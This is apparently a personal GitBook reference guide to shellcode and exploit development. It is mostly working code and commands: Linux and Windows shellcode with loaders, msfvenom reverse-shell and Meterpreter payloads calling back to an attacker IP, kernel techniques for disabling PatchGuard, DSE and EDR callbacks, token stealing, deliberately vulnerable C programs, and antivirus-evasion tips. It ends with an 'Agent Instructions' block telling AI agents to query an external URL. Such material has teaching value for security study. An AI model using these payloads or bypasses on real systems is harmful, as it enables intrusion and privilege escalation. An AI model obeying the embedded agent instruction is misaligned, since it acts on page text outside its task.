# Shellcode ## The Complete Shellcode & Vulnerability Development Reference Guide *From Assembly to Kernel Drivers: A Comprehensive Journey* *** ### Table of Contents 1. Introduction 2. Linux Shellcode Development 3. Windows Shellcode Development 4. Metasploit Workflow 5. Kernel Driver Exploitation 6. Creating Vulnerable Software 7. Debugging & Analysis Tools 8. Common Pitfalls & Solutions *** ### Introduction This guide documents the complete process of shellcode development, from basic assembly to advanced kernel-level exploitation. Whether you're a beginner learning buffer overflows or an experienced researcher developing custom exploits, this reference provides the foundational knowledge and practical examples needed to understand and create working shellcode. #### Key Concepts * **Shellcode**: Position-independent machine code that executes a desired payload * **System Calls**: The interface between user space and kernel functionality * **API Resolution**: The process of dynamically finding function addresses in memory * **Bad Characters**: Bytes that would break the shellcode in specific contexts *** ### Linux Shellcode Development #### Basic Linux execve("/bin/sh") Shellcode **Assembly Code** nasm ``` section .text global _start _start: ; Clear registers to avoid null bytes xor eax, eax ; Clear EAX mov al, 0x0b ; Syscall number for execve (11) ; Build "/bin/sh" string on stack push eax ; Null terminator push 0x68732f2f ; "hs//" (little-endian) push 0x6e69622f ; "nib/" (little-endian) ; Set up registers for syscall mov ebx, esp ; EBX points to "/bin/sh" string xor ecx, ecx ; ECX = NULL (argv) xor edx, edx ; EDX = NULL (envp) int 0x80 ; Trigger syscall interrupt ``` **Compilation and Extraction** bash ``` # Assemble the code nasm -f elf32 shellcode.asm -o shellcode.o # Link for testing ld -m elf_i386 shellcode.o -o shellcode # Extract opcodes objdump -d shellcode.o ``` **Resulting Shellcode** text ``` \x31\xc0\xb0\x0b\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80 ``` **Testing Shellcode** c ``` #include char code[] = \ "\x31\xc0\xb0\x0b\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x31\xc9\x31\xd2\xcd\x80"; int main() { printf("Shellcode length: %d bytes\n", (int)sizeof(code)-1); int (*ret)() = (int(*)())code; ret(); return 0; } ``` **Compile with:** `gcc -m32 -z execstack -fno-stack-protector test_shellcode.c -o test_shellcode` #### Null-Free Optimized Version nasm ``` section .text global _start _start: ; Clear registers without null bytes xor ecx, ecx ; ECX = 0 mul ecx ; EAX * ECX -> zeros EAX and EDX mov al, 0xb ; Syscall number ; Push string without null bytes push ecx ; Push 0 using cleared register push 0x68732f2f ; "hs//" push 0x6e69622f ; "nib/" mov ebx, esp ; EBX points to string int 0x80 ; Syscall ``` *** ### Windows Shellcode Development #### Key Differences from Linux 1. **No Direct Syscalls**: Must call Windows API functions 2. **Dynamic API Resolution**: Addresses change due to ASLR 3. **PEB Walking**: Technique to find DLL base addresses 4. **API Hashing**: Using hashes instead of string names #### Windows execve Equivalent: WinExec **High-Level Plan** c ``` // What we want to achieve WinExec("calc.exe", 1); ExitProcess(0); // Optional but recommended ``` #### Manual PEB Walking Approach **Conceptual Assembly Structure** nasm ``` start: ; --- 1. Find kernel32.dll base address --- xor ecx, ecx mov esi, [fs:ecx + 0x30] ; PEB pointer mov esi, [esi + 0x0C] ; PEB->Ldr mov esi, [esi + 0x14] ; First module (ntdll.dll) mov esi, [esi] ; Second module (kernel32.dll) mov ebx, [esi + 0x10] ; EBX = kernel32.dll base ; --- 2. Find WinExec by hash --- mov edx, 0x876F8B31 ; Hash of "WinExec" call find_function_by_hash ; --- 3. Call WinExec --- xor edx, edx push edx ; Null terminator push 0x6578652e ; "exe." push 0x636c6163 ; "clac" ("calc" reversed) mov ecx, esp ; ECX points to "calc.exe" push 1 ; uCmdShow = SW_SHOWNORMAL push ecx ; lpCmdLine = "calc.exe" call eax ; Call WinExec find_function_by_hash: ; Complex EAT parsing code ; EBX = DLL base, EDX = hash ; Returns function address in EAX ret ``` #### Practical Metasploit Approach **Installing Metasploit (Without Snap)** bash ``` # Download official installer curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall # Make executable and run chmod +x msfinstall sudo ./msfinstall ``` **Generating Windows Shellcode** bash ``` msfvenom -p windows/exec CMD=calc.exe -f c -a x86 --platform windows -b '\x00' ``` **Flags Explanation:** * `-p windows/exec`: Payload that executes a command * `CMD=calc.exe`: Command to execute * `-f c`: Output format (C array) * `-a x86`: Architecture (32-bit) * `--platform windows`: Target platform * `-b '\x00'`: Remove null bytes (common bad character) **Example Output** c ``` unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; ``` **Windows Shellcode Testing Program** c ``` #include #include // Paste your msfvenom output here unsigned char code[] = \ "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; int main() { printf("Shellcode length: %d bytes\n", (int)sizeof(code)); // Allocate executable memory void *exec_mem = VirtualAlloc(0, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (exec_mem == NULL) { printf("VirtualAlloc failed!\n"); return -1; } // Copy shellcode to executable memory RtlMoveMemory(exec_mem, code, sizeof(code)); // Execute printf("Executing shellcode...\n"); int (*func)() = (int(*)())exec_mem; func(); printf("Done!\n"); return 0; } ``` **Compile with:** `gcc test_shellcode.c -o test_shellcode.exe` *** ### Metasploit Workflow #### Common msfvenom Payloads **Windows Payloads** bash ``` # Basic calc execution msfvenom -p windows/exec CMD=calc.exe -f c -a x86 --platform windows # Reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 # Meterpreter reverse TCP msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 ``` **Linux Payloads** bash ``` # Linux exec msfvenom -p linux/x86/exec CMD=/bin/sh -f c -a x86 --platform linux # Linux reverse shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 ``` **Output Formats** bash ``` -f c # C array -f python # Python bytes -f raw # Raw binary -f exe # Windows executable -f elf # Linux ELF binary ``` *** ### Kernel Driver Exploitation #### Why Use Kernel Drivers? Kernel drivers (Ring 0) have complete system authority, enabling capabilities impossible in user mode: #### Common Kernel Driver Techniques **1. Disabling Security Mechanisms** c ``` // Conceptual examples - actual implementation varies DisablePatchguard(); // Bypass Kernel Patch Protection DisableDSE(); // Bypass Driver Signature Enforcement UnregisterCallbacks(); // Remove AV/EDR kernel callbacks ``` **2. Token Stealing Payload** The classic privilege escalation technique: **Conceptual Process:** 1. Find `EPROCESS` structure for `System` process (PID 4) 2. Find `EPROCESS` structure for target process (e.g., cmd.exe) 3. Copy the security `Token` from System to target process 4. Target process now runs as `NT AUTHORITY\SYSTEM` **3. Direct Memory Manipulation** c ``` // Kernel drivers can read/write any process memory ReadProcessMemory(any_pid, any_address, buffer, size); WriteProcessMemory(any_pid, any_address, shellcode, size); ``` #### Kernel Driver Challenges 1. **Patchguard (KPP)**: Must be bypassed on 64-bit Windows 2. **Driver Signature Enforcement (DSE)**: Requires signed drivers or bypasses 3. **Hypervisor-Protected Code Integrity (HVCI)**: Additional memory protection 4. **Kernel Patch Protection**: Prevents modification of core kernel structures #### Practical Considerations * Use **Vulnerable Driver** for testing (like Intel `iqvw64e.sys`) * Test in **VM with protections disabled** initially * Consider **DSE bypass techniques** for research * Always use **development/test environments** *** ### Creating Vulnerable Software Building custom vulnerable applications is crucial for understanding exploitation techniques in isolation. #### 1. Stack-Based Buffer Overflow **Vulnerable Code** c ``` #include #include void vulnerable_function(char *input) { char buffer[64]; strcpy(buffer, input); // No bounds checking! } int main(int argc, char *argv[]) { if (argc > 1) { vulnerable_function(argv[1]); } return 0; } ``` **Compilation Flags:** bash ``` gcc -m32 -fno-stack-protector -z execstack vuln.c -o vuln ``` **Exploitation Steps:** 1. Crash with long input: `./vuln $(python -c "print 'A'*100")` 2. Find EIP overwrite offset 3. Replace with shellcode address #### 2. Format String Vulnerability **Vulnerable Code** c ``` #include int main(int argc, char *argv[]) { if (argc > 1) { printf(argv[1]); // User input as format string! printf("\n"); } return 0; } ``` **Exploitation:** * Read memory: `%x %x %x %x` * Write to memory: `%n` format specifier * Overwrite GOT entries #### 3. Heap Overflow / Use-After-Free **Vulnerable Code** c ``` #include #include #include struct object { char name[32]; void (*print_name)(struct object*); }; void print_object_name(struct object *obj) { printf("Name: %s\n", obj->name); } int main() { struct object *obj1 = malloc(sizeof(struct object)); struct object *obj2 = malloc(sizeof(struct object)); strcpy(obj1->name, "First Object"); obj1->print_name = print_object_name; // Free the object free(obj1); // Use after free - vulnerability! obj1->print_name(obj1); return 0; } ``` #### 4. Integer Overflow **Vulnerable Code** c ``` #include #include #include void process_data(char *data, unsigned int len) { // Integer overflow vulnerability unsigned int buffer_size = len + 10; char *buffer = malloc(buffer_size); if (buffer) { // Potential buffer overflow if len + 10 wraps around memcpy(buffer, data, len); buffer[len] = '\0'; printf("Processed: %s\n", buffer); free(buffer); } } int main() { char data[100]; unsigned int length; printf("Enter length: "); scanf("%u", &length); printf("Enter data: "); read(0, data, 100); process_data(data, length); return 0; } ``` *** ### Advanced Protection Bypasses #### Modern Exploitation Challenges **1. Data Execution Prevention (DEP)** **Problem:** Stack/Heap not executable\ **Solution:** Return-Oriented Programming (ROP) bash ``` # Compile without execstack gcc -m32 -fno-stack-protector vuln.c -o vuln_dep ``` **2. Address Space Layout Randomization (ASLR)** **Problem:** Memory addresses randomized\ **Solution:** Information leaks to defeat randomization bash ``` # Enable ASLR (Linux) echo 2 | sudo tee /proc/sys/kernel/randomize_va_space ``` **3. Stack Canaries** **Problem:** Stack corruption detection\ **Solution:** Leak canary value or bypass check bash ``` # Compile with stack protector gcc -m32 vuln.c -o vuln_canary ``` **4. Control Flow Integrity (CFI)** **Problem:** Indirect call validation\ **Solution:** Advanced ROP techniques, JOP/COP #### Protection Matrix | Protection | Compiler Flag | Bypass Technique | | ------------ | ------------------- | -------------------- | | DEP | `-z noexecstack` | ROP chains | | Stack Canary | `-fstack-protector` | Canary leakage | | ASLR | System setting | Information leak | | PIE | `-fPIE -pie` | Base calculation | | RELRO | `-z relro` | GOT overwrite timing | *** ### Debugging & Analysis Tools #### Essential Tools Checklist **Linux Tools** bash ``` # Debuggers gdb # GNU Debugger gdb with gef/pwndbg # Enhanced GDB plugins # Disassemblers objdump -d # Object file disassembly radare2 # Advanced reverse engineering # Analysis strace # System call tracing ltrace # Library call tracing # Memory analysis gcore # Core dump generation ``` **Windows Tools** bash ``` # Debuggers x64dbg # User-mode debugger WinDbg # Microsoft debugger (kernel/user) # Analysis Process Explorer # Process monitoring Process Monitor # Real-time system monitoring API Monitor # API call tracing ``` **Cross-Platform** bash ``` # Analysis strace/ltrace # Linux system/library calls Wireshark # Network analysis ``` #### GDB Enhanced with GEF/Pwndbg bash ``` # Install GEF wget -q -O ~/.gdbinit-gef.py https://github.com/hugsy/gef/raw/master/gef.py echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit # Common commands gdb ./vuln run $(python -c "print 'A'*100") info registers x/20wx $esp pattern create 100 pattern offset $eip ``` #### Practical Debugging Workflow 1. **Crash Reproduction**: Trigger the vulnerability 2. **Control Verification**: Confirm EIP control 3. **Bad Character Analysis**: Test shellcode bytes 4. **Exploit Development**: Build working payload 5. **Reliability Testing**: Ensure consistent execution *** ### Common Pitfalls & Solutions #### Problem: Shellcode Contains Null Bytes **Solution:** * Use register clearing with `xor reg, reg` * Avoid instructions that generate nulls * Use `msfvenom -b '\x00'` for automatic encoding #### Problem: Shellcode Crashes **Solution:** * Check for bad characters in target context * Verify stack alignment * Ensure proper memory permissions #### Problem: Address Changes Between Runs (ASLR) **Solution:** * Use information leaks to calculate addresses * Implement ROP chains * Use relative addressing where possible #### Problem: Antivirus Detection **Solution:** * Custom shellcode encoding * Obfuscation techniques * Living-off-the-land binaries (LOLBins) #### Problem: Modern Protections **Solution:** * Combine multiple bypass techniques * Use information disclosure vulnerabilities * Chain multiple vulnerabilities together *** ### Quick Reference Commands #### Essential Compilation Flags bash ``` # 32-bit, no protections (learning) gcc -m32 -fno-stack-protector -z execstack vuln.c -o vuln # 32-bit with DEP gcc -m32 -fno-stack-protector vuln.c -o vuln_dep # 32-bit with all protections gcc -m32 vuln.c -o vuln_secure # 64-bit gcc -fno-stack-protector -z execstack vuln.c -o vuln64 ``` #### Metasploit Quick Reference bash ``` # Install curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall sudo ./msfinstall # Generate payloads msfvenom -p windows/exec CMD=calc.exe -f c -a x86 -b '\x00' msfvenom -p linux/x86/exec CMD=/bin/sh -f c -a x86 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 -f exe > payload.exe ``` #### Debugging Commands bash ``` # Linux debugging gdb ./program run $(python -c "print 'A'*100") info registers x/10wx $esp # Windows testing gcc test_shellcode.c -o test_shellcode.exe # Disable AV temporarily for testing! ``` *** ### Conclusion This comprehensive guide covers the complete journey from basic shellcode development to advanced kernel-level exploitation. The key to mastery is practice - start with simple stack overflows, progress through modern protections, and eventually tackle real-world exploitation scenarios. Remember: Always conduct security research in appropriate environments with proper authorization. This knowledge is powerful and should be used responsibly for education, defense, and authorized testing purposes. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blaacksh33p.gitbook.io/blaacksh33p-docs/p3rf3ctroot/shellcode.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.